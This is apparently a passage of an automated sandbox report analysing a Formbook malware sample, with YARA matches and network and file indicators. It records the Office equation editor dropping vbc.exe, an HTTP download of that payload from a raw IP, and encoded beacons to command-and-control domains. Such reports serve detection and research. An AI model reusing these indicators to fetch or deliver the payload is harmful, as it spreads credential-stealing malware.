            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.456132086.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpg
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
            Source: explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmpJump to behavior
            Source: unknownDNS traffic detected: queries for: www.mountfrenchlodge.net
            Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
